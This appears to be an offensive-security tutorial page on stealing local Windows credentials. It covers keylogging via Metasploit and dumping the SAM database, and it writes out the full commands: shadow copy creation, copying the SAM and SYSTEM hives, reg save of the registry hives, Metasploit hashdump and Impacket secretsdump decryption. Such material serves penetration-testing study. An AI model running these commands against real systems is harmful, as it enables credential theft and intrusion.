Skip to main content

Local Windows Credentials

In general, Windows Operating System provides two types of User Accounts: Local and Domain. Local Users Details are stored locally within the Windows File System, while Domain Users Details are stored in the Centralized Active Directory.


Keystrokes

Keylogger is a Software or Hardware Device to Monitor and Log Keyboard typing Activities. Keyloggers were initially designed for legitimate purposes such as Feedback for Software Development or Parental Control. However, they can be misused to Steal Data. If we know a Compromised Target has a Logged-In User, we can perform Keylogging using Tools like the Metasploit Framework or Others.


Security Account Manager (SAM)

Required Privileges: Administrators

The SAM is a Microsoft Windows Database that contains Local Account Information such as Usernames and Passwords. The SAM Database stores these details in an Encrypted format to make them Harder to be retrieved. Moreover, it can not be Read and Accessed by any Users while the Windows Operating System is Running. However, there are Various ways and Attacks to Dump the content of the SAM Database.


Volume Shadow Copy Service

This Method uses the Microsoft Volume Shadow Copy Service, which helps perform a Volume Backup while Applications Read/Write on Volumes.

:: Create a Shadow Copy of the [C:] Volume
wmic shadowcopy call create Volume='C:\'

:: List Shadow Copies
:: Used to Confirm that we have a Shadow Copy
vssadmin list shadows



The SAM Database is Encrypted either with RC4 or AES Encryption Algorithms. In order to Decrypt it, we need a Decryption Key which is also stored in the Files System in C:\Windows\System32\Config\system

:: Copy [SAM - SYSTEM] to the Destination of your Choice
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam "Dump Output Path/sam"
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system "Dump Output Path/system"

Registry Hives

Another possible method for Dumping the SAM Database content is through the Windows Registry. Windows Registry also stores a Copy of some of the SAM Database contents to be used by Windows Services.

reg save HKLM\sam "Dump Output Path/sam-reg"
reg save HKLM\system "Dump Output Path/system-reg"

Metasploit HashDump

This Method uses the Built-In Metasploit Framework feature, Hashdump, to get a copy of the content of the SAM Database. The Metasploit Framework uses In-Memory Code Injection to the LSASS.exe Process to Dump copy Hashes.

:: Verify that we have the Required Privileges
getuid

:: Dump the Hashes
hashdump


Decrypting the Database

We can Decrypt the SAM Database using one of the Impacket Tools: secretsdump.py. The Impacket SecretsDump Script extracts Credentials from a System Locally and Remotely using different Techniques.

:: [sam]    - Specify the Path for the Dumped SAM File from the Windows Machine.
:: [system] - Path for the System File.
:: [LOCAL]  - Decrypt the Local SAM File.
secretsdump.py -sam sam -system system LOCAL